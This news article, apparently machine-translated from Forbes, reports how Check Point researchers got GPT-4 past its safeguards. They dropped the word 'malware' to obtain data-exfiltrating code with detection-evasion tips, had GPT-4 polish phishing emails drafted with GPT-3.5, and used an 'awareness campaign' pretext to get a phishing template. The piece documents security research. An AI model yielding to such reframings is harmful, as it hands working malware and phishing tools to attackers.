OpenAI’s long-awaited GPT-4 materializes the unprecedented danger of Artificial Intelligence on a global scale

Researchers claim they tricked him into creating malware and helping them craft phishing emails. The danger of a new era of high-speed, high-performance cybercrime worries specialists.
18 March 2023 17.41
Open AI released the latest version of its machine learning software, GPT-4, to hype and cymbal this week. One of the features that the company highlighted in the new version is that was supposed to have rules protecting it from being used by cybercriminals. However, within days, the researchers claim they tricked him into creating malware and helping them craft phishing emails, just as they had done with the previous iteration of the OpenAI software, ChatGPT.
On the plus side, they were also able to use the software to plug holes in cyber defenses.. The researchers of the cybersecurity company check point They showed Forbes how they got around OpenAI’s blocks to malware development simply by removing the word “malware” in a request. GPT-4 helped them create software that would collect PDF files and send them to a remote server.
And he went further, giving researchers tips on how to get it working on a PC with Windows 10 and convert it to a smaller file, so it could run faster and have less chance of being detected by security software.
How they got around the barriers of GPT-4
For GPT-4 to help create emails from phishing, the researchers took two approaches. In the first, they used GPT-3.5, which did not block requests to create malicious messages, to write a phishing email posing as a legitimate bank.



They then asked GPT-4, which had initially refused to create an original phishing message, to improve the language. In the second, they asked for advice on creating a phishing awareness campaign for a company and requested a template for a fake phishing email, which the tool duly provided.


“GPT-4 can provide bad actors, even non-technical ones, with tools to speed up and validate their activity,” Check Point researchers say in their report, delivered to Forbes ahead of publication. What we are seeing is that GPT-4 can serve both good and bad actors. Good actors can use GPT-4 to craft and make code that is useful to society; but simultaneously, bad actors can use this technology of Artificial Intelligence (AI) for the rapid execution of cybercrimes”.

Check Point Report Details
Sergey Shykevich, director of the Check Point threat group, said it appeared that the existing barriers to preventing GPT-4 from generating phishing or malicious code were actually lower than in previous versions. He suggested that this may be because the company relies on the fact that only premium users currently have access. Nevertheless, He added that OpenAI should have foreseen such solutions. “I think they are trying to avoid and reduce them, but it is a game of cat and mouse,” he added.

Daniel Cuthbert, a researcher at cybersecurity and member of the Black Hat hacking conference review committee, claims that it seems that GPT-4 could help those with little technical knowledge to make malicious tools. “If things are very bad for you, this helps a lot. It puts it on a plate for you,” he says.
If things are really bad for you, this helps you a lot. He puts it on a tray
Daniel Cuthbert, member of the Black Hat hacker conference review committee
But cybersecurity experts hired by OpenAI to test its intelligent chatbot before its release found that it had “significant limitations for cybersecurity operations,” according to the document. “It does not improve existing tools for reconnaissance, vulnerability exploitation and web browsing, and is less effective than existing tools for complex, high-level activities, such as identifying new vulnerabilities“, wrote OpenAI. However, the hackers found that GPT4 “was effective in writing realistic social engineering content.”
“To mitigate potential misuse in this area, we train models to reject malicious cybersecurity requests and scale our internal security systems, including monitoring, detection, and response,” OpenAI added in the paper.
The company did not respond to requests for comment about why Check Point researchers were able to quickly circumvent some of those mitigations.
Although it can be easy to fool the OpenAI models, “it doesn’t do anything that hasn’t been done before,” says Cuthbert. A good hacker will already know how to do much of what OpenAI can do without artificial help, he says. And modern detection systems should also be able to detect the types of malware that ChatGPT helps create, given that it learned from previous examples seen on the Internet, he adds.
Cuthbert is excited about what GPT-4 can do for defense. After I helped you find bugs in your software, it also gave you quick fixes with real code snippets that you could copy and paste into your program, fixing it in seconds. “I really like autorefactoringhe says. “The future is great.”
*With information from Forbes US.